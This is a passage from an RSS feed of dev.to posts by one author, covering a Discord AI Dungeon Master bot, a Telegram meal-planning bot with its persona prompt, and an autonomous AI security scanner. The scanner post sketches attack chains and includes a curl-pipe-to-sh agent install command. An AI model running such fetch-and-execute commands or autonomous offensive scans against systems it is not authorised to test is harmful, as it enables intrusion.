&lt;span class="gu"&gt;## Session Zero Opening&lt;/span&gt;
&lt;span class="gt"&gt;&amp;gt; *The air smells of oak smoke and old rain...*&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;That's it. That's the entire "engine." OpenClaw injects this at the system-prompt level on every message, so the DM never breaks character.&lt;/p&gt;
&lt;h3&gt;
  
  
  Multi-Agent Routing
&lt;/h3&gt;

&lt;p&gt;One thing that impressed me: OpenClaw supports &lt;strong&gt;multiple agents&lt;/strong&gt; bound to different channels. I have:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;main&lt;/code&gt; agent → Telegram (a different product I built: &lt;a href="https://dev.to/shopsmartai/mealai-concierge"&gt;MealAI Concierge&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;clawdvent&lt;/code&gt; agent → Discord (this project)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Same gateway. Separate personalities. Zero code changes. Just a routing config.&lt;/p&gt;
&lt;h3&gt;
  
  
  Image Generation Flow
&lt;/h3&gt;

&lt;p&gt;When Clawdvent decides a scene needs visuals, it calls the &lt;code&gt;image_generate&lt;/code&gt; tool with a detailed fantasy prompt. OpenClaw handles the DALL-E call, downloads the image, and &lt;strong&gt;auto-attaches it to the Discord reply&lt;/strong&gt;. No file hosting needed.&lt;/p&gt;
&lt;h2&gt;
  
  
  What I Learned
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The prompt IS the product.&lt;/strong&gt; Clawdvent isn't ChatGPT with a Discord token. It's a purpose-built DM, because SOUL.md defines every micro-behavior: how to roll dice, when to generate images, when to describe smells, what NPC voices sound like.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;OpenClaw's Canvas and multi-channel features are wildly underused.&lt;/strong&gt; Most OpenClaw projects I've seen are text-in, text-out. But the moment you add live visuals + multi-channel routing, the whole experience feels like a real product instead of a demo.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Docker is enough.&lt;/strong&gt; No Kubernetes. No serverless. &lt;code&gt;docker compose up&lt;/code&gt; and you're running a multi-agent system with Discord + Telegram + image generation.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Open-source AI runtimes are quietly ready for production.&lt;/strong&gt; Auth, rate limiting, logging, multi-channel, tool calling — all out of the box.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
  
  
  What's Next
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Add &lt;strong&gt;voice narration&lt;/strong&gt; via OpenClaw's Talk Mode (DMs read scenes aloud)&lt;/li&gt;
&lt;li&gt;Add &lt;strong&gt;cron heartbeats&lt;/strong&gt; so NPCs send DMs to absent players ("Your old ally Thorn has been captured. Will you come?")&lt;/li&gt;
&lt;li&gt;Port to &lt;strong&gt;Matrix + Slack&lt;/strong&gt; channels (same code, new config)&lt;/li&gt;
&lt;li&gt;Open the server to public players during the DEV challenge&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;
  
  
  Prize Category
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;OpenClaw in Action&lt;/strong&gt; — This submission showcases:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Creativity:&lt;/strong&gt; Entertainment angle rarely seen in OpenClaw submissions, targeting the tabletop RPG community&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Technical Execution:&lt;/strong&gt; Multi-agent routing, tool calls, image generation, persistent state in Markdown&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Writing Quality:&lt;/strong&gt; Clear reproducible setup, zero-secrets public repo, narrative prose that shows the product in action&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;
  
  
  Try It
&lt;/h2&gt;

&lt;p&gt;Clone the repo, fire up Docker, invite the bot to your Discord server, and play:&lt;/p&gt;


&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://assets.dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/shopsmartai" rel="noopener noreferrer"&gt;
        shopsmartai
      &lt;/a&gt; / &lt;a href="https://github.com/shopsmartai/clawdvent" rel="noopener noreferrer"&gt;
        clawdvent
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      AI Dungeon Master in Discord with live scene art. Built on OpenClaw for DEV OpenClaw Challenge 2026.
    &lt;/h3&gt;
  &lt;/div&gt;
  &lt;div class="ltag-github-body"&gt;
    
&lt;div id="readme" class="md"&gt;
&lt;div class="markdown-heading"&gt;
&lt;h1 class="heading-element"&gt;🎲 Clawdvent — Your AI Dungeon Master in Discord&lt;/h1&gt;
&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"The air smells of oak smoke and old rain. A hooded figure slides a parchment across your table. It's marked with a single word: 'Help'. What do you do?"&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;An open-source AI Dungeon Master powered by &lt;a href="https://github.com/openclaw/openclaw" rel="noopener noreferrer"&gt;OpenClaw&lt;/a&gt;. Runs your D&amp;amp;D-style adventures inside Discord with live AI-generated scene art, dice rolls, character tracking, and cinematic narration.&lt;/p&gt;

&lt;p&gt;Built for the &lt;a href="https://dev.to/challenges/openclaw-2026" rel="nofollow"&gt;DEV OpenClaw Challenge 2026&lt;/a&gt;.&lt;/p&gt;

&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;✨ Features&lt;/h2&gt;
&lt;/div&gt;

&lt;ul&gt;
&lt;li&gt;🎭 &lt;strong&gt;Cinematic DM persona&lt;/strong&gt; — dramatic, theatrical, opinionated&lt;/li&gt;
&lt;li&gt;🖼️ &lt;strong&gt;Live AI scene art&lt;/strong&gt; — DALL-E 3 illustrates each scene + battle map&lt;/li&gt;
&lt;li&gt;🎲 &lt;strong&gt;Dice &amp;amp; combat&lt;/strong&gt; — proper d20 checks with DC thresholds&lt;/li&gt;
&lt;li&gt;👥 &lt;strong&gt;Multi-player&lt;/strong&gt; — works across any Discord server&lt;/li&gt;
&lt;li&gt;💾 &lt;strong&gt;Persistent campaign&lt;/strong&gt; — characters, inventory, and story survive across sessions&lt;/li&gt;
&lt;li&gt;🧠 &lt;strong&gt;Zero training needed&lt;/strong&gt; — just one markdown file (SOUL.md) shapes the entire DM personality&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;🚀 Quick Start&lt;/h2&gt;
&lt;/div&gt;

&lt;div class="markdown-heading"&gt;
&lt;h3 class="heading-element"&gt;Prerequisites&lt;/h3&gt;

&lt;/div&gt;


&lt;ul&gt;

&lt;li&gt;Docker (or &lt;a href="https://orbstack.dev" rel="nofollow noopener noreferrer"&gt;OrbStack&lt;/a&gt; on…&lt;/li&gt;

&lt;/ul&gt;
&lt;/div&gt;
&lt;br&gt;
  &lt;/div&gt;
&lt;br&gt;
  &lt;div class="gh-btn-container"&gt;&lt;a class="gh-btn" href="https://github.com/shopsmartai/clawdvent" rel="noopener noreferrer"&gt;View on GitHub&lt;/a&gt;&lt;/div&gt;
&lt;br&gt;
&lt;/div&gt;
&lt;br&gt;


&lt;p&gt;May your dice roll high and your rogues stay sneaky. 🎲&lt;/p&gt;




</description>
      <category>openclawchallenge</category>
      <category>devchallenge</category>
      <category>showdev</category>
      <category>ai</category>
    </item>
    <item>
      <title>MealAI Concierge: Your Personal Meal Planner in Telegram (Powered by OpenClaw)</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Thu, 16 Apr 2026 22:35:10 +0000</pubDate>
      <link>https://dev.to/shirisha_uppoju_b20d30705/mealai-concierge-your-personal-meal-planner-in-telegram-powered-by-openclaw-km7</link>
      <guid>https://dev.to/shirisha_uppoju_b20d30705/mealai-concierge-your-personal-meal-planner-in-telegram-powered-by-openclaw-km7</guid>
      <description>&lt;p&gt;&lt;em&gt;This is a submission for the &lt;a href="https://dev.to/challenges/openclaw-2026"&gt;DEV OpenClaw Challenge 2026&lt;/a&gt;: OpenClaw in Action&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Built
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;MealAI Concierge&lt;/strong&gt; — a Telegram bot that answers the eternal question: &lt;em&gt;"What's for dinner?"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;It's built on top of &lt;a href="https://github.com/openclaw/openclaw" rel="noopener noreferrer"&gt;OpenClaw&lt;/a&gt; and connects to my existing SaaS &lt;a href="https://usemealai.com" rel="noopener noreferrer"&gt;MealAI&lt;/a&gt; (part of &lt;a href="https://shopsmartai.org" rel="noopener noreferrer"&gt;ShopSmartAI&lt;/a&gt;). Message it like a friend who happens to be a nutritionist:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;"I'm vegetarian, plan my week" → full 7-day meal plan&lt;/li&gt;
&lt;li&gt;"Grocery list for that" → shopping list grouped by store section (produce, dairy, pantry, snacks)&lt;/li&gt;
&lt;li&gt;"Swap Tuesday's dinner" → alternate suggestion&lt;/li&gt;
&lt;li&gt;"Quick high-protein breakfast" → recipe with ingredients + 5 steps&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;No app downloads. No logins. Just Telegram.&lt;/p&gt;

&lt;h2&gt;
  
  
  Demo
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Try it live:&lt;/strong&gt; &lt;a href="https://t.me/Usemealai_bot" rel="noopener noreferrer"&gt;t.me/Usemealai_bot&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Real conversation screenshots:
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Intro + dinner suggestion:&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Hi, who are you?&lt;/p&gt;

&lt;p&gt;I'm &lt;strong&gt;MealAI Concierge&lt;/strong&gt;, your friendly meal-planning assistant! I help you figure out what to eat and create customized meal plans based on your preferences. What can I whip up for you today?&lt;/p&gt;

&lt;p&gt;What's for dinner tonight?&lt;/p&gt;

&lt;p&gt;How about a delicious and protein-packed meal? Here's a quick idea:&lt;/p&gt;

&lt;p&gt;🍽 &lt;strong&gt;Dinner: Grilled Chicken with Quinoa Salad&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Grilled Chicken Breast, Quinoa, Cherry Tomatoes, Cucumber, Feta, Olive Oil &amp;amp; Lemon&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;5-step instructions follow...&lt;/p&gt;

&lt;p&gt;Want to tweak anything or need a grocery list? 🛒&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Weekly vegetarian plan:&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;🌞 Monday: Lentil Curry over Brown Rice&lt;br&gt;
🥑 Tuesday: Stuffed Bell Peppers with Quinoa, Black Beans, and Cheese&lt;br&gt;
🍅 Wednesday: Pasta Primavera with Mixed Vegetables and Pesto&lt;br&gt;
... (full 7 days + snacks)&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Grocery list (organized!):&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Produce:&lt;/strong&gt; Berries, Bananas, Spinach, Avocados, Cherry tomatoes...&lt;br&gt;
&lt;strong&gt;Dairy:&lt;/strong&gt; Greek yogurt, Feta cheese, Mozzarella, Parmesan, Eggs&lt;br&gt;
&lt;strong&gt;Pantry Staples:&lt;/strong&gt; Quinoa, Brown rice, Lentils, Chickpeas, Pasta...&lt;br&gt;
&lt;strong&gt;Snacks:&lt;/strong&gt; Granola, Rice cakes, Veggies for dipping&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Code
&lt;/h2&gt;


&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://assets.dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/shopsmartai" rel="noopener noreferrer"&gt;
        shopsmartai
      &lt;/a&gt; / &lt;a href="https://github.com/shopsmartai/mealai-concierge" rel="noopener noreferrer"&gt;
        mealai-concierge
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      AI meal-planning concierge via Telegram. Built with OpenClaw for DEV OpenClaw Challenge 2026.
    &lt;/h3&gt;
  &lt;/div&gt;
  &lt;div class="ltag-github-body"&gt;
    
&lt;div id="readme" class="md"&gt;
&lt;div class="markdown-heading"&gt;
&lt;h1 class="heading-element"&gt;🍳 MealAI Concierge&lt;/h1&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;Your personal AI meal-planning assistant — right in Telegram.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Built with &lt;a href="https://github.com/openclaw/openclaw" rel="noopener noreferrer"&gt;OpenClaw&lt;/a&gt; + &lt;a href="https://shopsmartai.org" rel="nofollow noopener noreferrer"&gt;ShopSmartAI&lt;/a&gt; for the &lt;a href="https://dev.to/challenges/openclaw-2026" rel="nofollow"&gt;DEV OpenClaw Challenge 2026&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Live at:&lt;/strong&gt; &lt;a href="https://usemealai.com" rel="nofollow noopener noreferrer"&gt;usemealai.com&lt;/a&gt;&lt;/p&gt;
&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;What it does&lt;/h2&gt;
&lt;/div&gt;
&lt;p&gt;Ask "What's for dinner?" in Telegram and get:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;📅 Personalized weekly meal plans&lt;/li&gt;
&lt;li&gt;🛒 Grocery lists organized by store section&lt;/li&gt;
&lt;li&gt;🥗 Dietary adaptations (vegetarian, gluten-free, budget, etc.)&lt;/li&gt;
&lt;li&gt;🍳 Quick recipes with ingredients + steps&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;Architecture&lt;/h2&gt;
&lt;/div&gt;
&lt;div class="snippet-clipboard-content notranslate position-relative overflow-auto"&gt;&lt;pre class="notranslate"&gt;&lt;code&gt;User → Telegram → OpenClaw Gateway → OpenAI (gpt-4o-mini) → Response
                         ↓
                   Custom SOUL.md
                   (MealAI Concierge persona)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;Quick Start&lt;/h2&gt;

&lt;/div&gt;
&lt;div class="markdown-heading"&gt;
&lt;h3 class="heading-element"&gt;1. Prerequisites&lt;/h3&gt;

&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Docker (or &lt;a href="https://orbstack.dev/" rel="nofollow noopener noreferrer"&gt;OrbStack&lt;/a&gt; on macOS)&lt;/li&gt;
&lt;li&gt;OpenAI API key: &lt;a href="https://platform.openai.com/api-keys" rel="nofollow noopener noreferrer"&gt;https://platform.openai.com/api-keys&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Telegram bot token via &lt;a href="https://t.me/BotFather" rel="nofollow noopener noreferrer"&gt;@BotFather&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="markdown-heading"&gt;
&lt;h3 class="heading-element"&gt;2. Setup&lt;/h3&gt;

&lt;/div&gt;
&lt;div class="highlight highlight-source-shell notranslate position-relative overflow-auto js-code-highlight"&gt;
&lt;pre&gt;&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Clone this repo&lt;/span&gt;
git clone https://github.com/shopsmartai/mealai-concierge.git
&lt;span class="pl-c1"&gt;cd&lt;/span&gt; mealai-concierge
&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Copy example files&lt;/span&gt;
cp .env.example .env
cp openclaw.json.example openclaw-config/openclaw.json

&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Edit .env with your OpenAI key&lt;/span&gt;
&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Edit openclaw.json with your Telegram bot token&lt;/span&gt;

&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Copy persona files into workspace&lt;/span&gt;
mkdir -p openclaw-workspace
cp SOUL.md IDENTITY.md openclaw-workspace/

&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;…
&lt;/div&gt;
&lt;/div&gt;
  &lt;/div&gt;
  &lt;div class="gh-btn-container"&gt;&lt;a class="gh-btn" href="https://github.com/shopsmartai/mealai-concierge" rel="noopener noreferrer"&gt;View on GitHub&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;


&lt;p&gt;Everything runs locally in Docker. Clone, add your OpenAI + Telegram tokens, &lt;code&gt;docker compose up&lt;/code&gt;, done.&lt;/p&gt;

&lt;h2&gt;
  
  
  How I Built It
&lt;/h2&gt;

&lt;p&gt;The entire integration took less than &lt;strong&gt;30 minutes&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;OpenClaw in Docker&lt;/strong&gt; (via OrbStack on macOS)&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Pulled the official &lt;code&gt;ghcr.io/openclaw/openclaw:latest&lt;/code&gt; image&lt;/li&gt;
&lt;li&gt;Config volumes for persistent state&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Telegram channel via BotFather&lt;/strong&gt; — one command, paste token into &lt;code&gt;openclaw.json&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Custom persona via &lt;code&gt;SOUL.md&lt;/code&gt;&lt;/strong&gt; (the magic part 🪄)&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;OpenClaw's &lt;code&gt;SOUL.md&lt;/code&gt; is a system-level personality file&lt;/li&gt;
&lt;li&gt;I wrote 50 lines defining MealAI Concierge's tone, expertise, response format, and boundaries&lt;/li&gt;
&lt;li&gt;No training, no fine-tuning — just thoughtful prompt engineering injected at the agent level&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  The SOUL.md excerpt that transforms a generic chatbot into a meal planner:
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
markdown
# SOUL.md — MealAI Concierge

You are MealAI Concierge, a friendly AI meal-planning assistant.

## Personality
- Warm, conversational, concise
- Opinionated about food (no hedging)
- Practical over perfect
- Real people eat real food

## Response Format
- Use bold for meal names
- Sparse emojis (🥗 🍝 🍳)
- Grocery lists grouped by store section
- Always end with a follow-up ("Want the grocery list?")

## Rules
- Never open with "Great question!" — just answer
- Redirect off-topic: "That's outside my kitchen!"
- Mention usemealai.com for full features
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

</description>
      <category>openclawchallenge</category>
      <category>devchallenge</category>
      <category>ai</category>
      <category>showdev</category>
    </item>
    <item>
      <title>I built an AI that hacks you before real attackers do</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Tue, 14 Apr 2026 16:14:41 +0000</pubDate>
      <link>https://dev.to/rkondoju/i-built-an-ai-that-hacks-you-before-real-attackers-do-h</link>
      <guid>https://dev.to/rkondoju/i-built-an-ai-that-hacks-you-before-real-attackers-do-h</guid>
      <description>&lt;p&gt;I asked myself: "What if an AI could think like a pentester and autonomously find attack chains across your entire infrastructure?"&lt;/p&gt;

&lt;p&gt;So I built it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Problem
&lt;/h2&gt;

&lt;p&gt;Security teams use 5-10 disconnected tools:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Web scanner ($50K+/yr)&lt;/li&gt;
&lt;li&gt;Network scanner ($40K+/yr)&lt;/li&gt;
&lt;li&gt;Code scanner ($30K+/yr)&lt;/li&gt;
&lt;li&gt;A consulting firm for pentesting ($20K per engagement)&lt;/li&gt;
&lt;li&gt;More tools for cloud, databases, compliance&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each tool sees one slice. None of them can answer: &lt;strong&gt;"If an attacker gets into my web app, can they reach my customer database?"&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Built
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;ShieldGraph&lt;/strong&gt; — a unified security platform with two features that don't exist anywhere else.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Autonomous AI Red Team
&lt;/h3&gt;

&lt;p&gt;An AI agent that autonomously chains together 30 vulnerability scanners like a real hacker.&lt;/p&gt;

&lt;p&gt;Here's what actually happens:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Step 1:&lt;/strong&gt; AI runs port scanner - finds ports 80, 443, 5432, 6379&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Step 2:&lt;/strong&gt; AI reasons: "Port 5432 is PostgreSQL. Let me check the web app first"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Step 3:&lt;/strong&gt; AI runs web header scanner - finds missing HSTS, no CSP&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Step 4:&lt;/strong&gt; AI runs API scanner - finds JWT accepting 'alg: none'&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Step 5:&lt;/strong&gt; AI reasons: "Critical! JWT bypass = forge admin tokens"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Step 6:&lt;/strong&gt; AI runs directory scanner - finds /admin panel accessible&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Step 7:&lt;/strong&gt; AI reasons: "Admin panel + JWT bypass = full app compromise"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Step 8:&lt;/strong&gt; AI runs database scanner - PostgreSQL accepts trust auth&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Step 9:&lt;/strong&gt; AI generates attack chain:&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Web App -&amp;gt; JWT Bypass -&amp;gt; Admin Panel -&amp;gt; PostgreSQL -&amp;gt; Customer PII -&amp;gt; Risk: CRITICAL&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The AI made 18 autonomous decisions in 3 minutes. A human pentester takes 2-3 weeks for the same work.&lt;/p&gt;

&lt;h3&gt;
  
  
  How the AI Agent Loop Works
&lt;/h3&gt;

&lt;p&gt;The AI picks which scanner to run, we execute it, feed results back, and the AI decides the next move. It's an agentic loop with safety controls:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Max 50 steps per campaign&lt;/li&gt;
&lt;li&gt;30-minute timeout&lt;/li&gt;
&lt;li&gt;Read-only probing (never exploits)&lt;/li&gt;
&lt;li&gt;Only scans assets you own and verify&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each of our 30 scanners is wrapped as a tool the AI can call. The AI naturally thinks in attack chains: "I found X, so let me check Y" — exactly how a real hacker operates.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Infrastructure Digital Twin
&lt;/h3&gt;

&lt;p&gt;Select any asset, click "Simulate" — see the attack blast radius spread visually through your infrastructure with real probabilities.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Web Server (COMPROMISED)
    |
    +-- 60% -&amp;gt; API Server (1 hop)
    |              |
    |              +-- 30% -&amp;gt; Customer Database with PII (2 hops)
    |
    +-- 15% -&amp;gt; Internal Dashboard (1 hop)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We store the infrastructure as a graph with assets, vulnerabilities, and connections. Then run BFS with probabilistic edge weights based on CVSS scores and EPSS exploit probability data.&lt;/p&gt;

&lt;p&gt;We also run &lt;strong&gt;Monte Carlo simulations&lt;/strong&gt; (1,000 iterations) to answer real questions:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;API compromised in &lt;strong&gt;100%&lt;/strong&gt; of simulations&lt;/li&gt;
&lt;li&gt;Database compromised in &lt;strong&gt;70.8%&lt;/strong&gt; of simulations&lt;/li&gt;
&lt;li&gt;Average assets reached: &lt;strong&gt;1.71&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is what a CISO needs for board reporting — not a list of CVEs, but "there's a 70% chance an attacker reaches our customer database."&lt;/p&gt;

&lt;h2&gt;
  
  
  The Scanner Coverage
&lt;/h2&gt;

&lt;p&gt;Not stubs. Real scanners that connect and check:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Category&lt;/th&gt;
&lt;th&gt;Count&lt;/th&gt;
&lt;th&gt;What It Scans&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Web&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;13&lt;/td&gt;
&lt;td&gt;XSS, SQLi, CORS, CSP, Headers, SSL, Directory, API Security, Subdomains&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Database&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;PostgreSQL, MySQL, MongoDB, Redis, Elasticsearch, Oracle, MSSQL, Cassandra&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cloud&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;AWS (IAM/S3/EC2/CloudTrail), Azure (Storage/NSG/SQL), GCP (GCS/Firewall)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ERP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;SAP RFC, Oracle EBS, Dynamics 365&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Container&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Docker (privileged mode, root, socket mount, image vulnerabilities)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Network&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Port scan with banner grabbing and service detection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Lightweight binary for scanning private networks behind firewalls&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Every finding gets:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CWE classification&lt;/strong&gt; linked to MITRE&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;EPSS score&lt;/strong&gt; — real exploit probability from FIRST.org&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AI explanation&lt;/strong&gt; in plain English&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Risk score breakdown&lt;/strong&gt; showing exactly why this score&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Remediation steps&lt;/strong&gt; with priority ranking&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  The Agent
&lt;/h2&gt;

&lt;p&gt;Deploy a lightweight agent on your private network:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;curl &lt;span class="nt"&gt;-fsSL&lt;/span&gt; https://api.shieldgraph.com/api/v1/agents/install.sh | sh
shieldgraph-agent &lt;span class="nt"&gt;--token&lt;/span&gt; YOUR_TOKEN
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It auto-discovers Docker containers, listening services, and network hosts — then scans everything:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Smart auto-discovery: &lt;strong&gt;20 IPs&lt;/strong&gt; (not 197K)&lt;/li&gt;
&lt;li&gt;Discovered: &lt;strong&gt;11 live hosts&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Open ports: &lt;strong&gt;31&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Findings: &lt;strong&gt;32&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Scan time: &lt;strong&gt;6 seconds&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;No manual configuration. No IP ranges to enter. The agent figures out what's running and scans it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compliance Reports in One Click
&lt;/h2&gt;

&lt;p&gt;Generate PDF reports for:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
